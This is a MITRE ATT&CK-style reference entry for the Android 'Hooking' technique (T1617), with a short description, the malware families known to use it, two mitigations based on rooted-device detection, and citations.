T1617 Hooking
Adversaries may utilize hooking to hide the presence of artifacts associated with their behaviors to evade detection. Hooking can be used to modify return values or data structures of system APIs and function calls. This process typically involves using 3rd party root frameworks, such as Xposed or Magisk, with either a system exploit or pre-existing root access. By including custom modules for root frameworks, adversaries can hook system APIs and alter the return value and/or system data structures to alter functionality/visibility of various aspects of the system.
| Item | Value |
|---|---|
| ID | T1617 |
| Sub-techniques | |
| Tactics | TA0030 |
| Platforms | Android |
| Version | 1.0 |
| Created | 24 September 2021 |
| Last Modified | 24 October 2025 |
Procedure Examples
| ID | Name | Description |
|---|---|---|
| S1208 | FjordPhantom | FjordPhantom has used the hooking framework in a variety of ways, including returning false information to detection mechanisms, pretending that GooglePlayServices are unavailable, and manipulating UI functionality.3 |
| S1231 | GodFather | GodFather has used the Xposed hooking framework to intercept HTTP requests and responses, capturing and exfiltrating sensitive information, such as credentials.2 |
| S0407 | Monokle | Monokle can hook itself to appear invisible to the Process Manager.1 |
Mitigations
| ID | Mitigation | Description |
|---|---|---|
| M1002 | Attestation | Device attestation can often detect rooted devices. |
| M1010 | Deploy Compromised Device Detection Method | Mobile security products can often detect rooted devices. |
References
-
Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019. ↩
-
Ortega, F. Pratapagiri, V. (2025, June 18). Your Mobile App, Their Playground: The Dark Side of Virtualization. Retrieved July 16, 2025. ↩
-
Promon Security Research Team. (2024, October 1). Retrieved February 19, 2025. ↩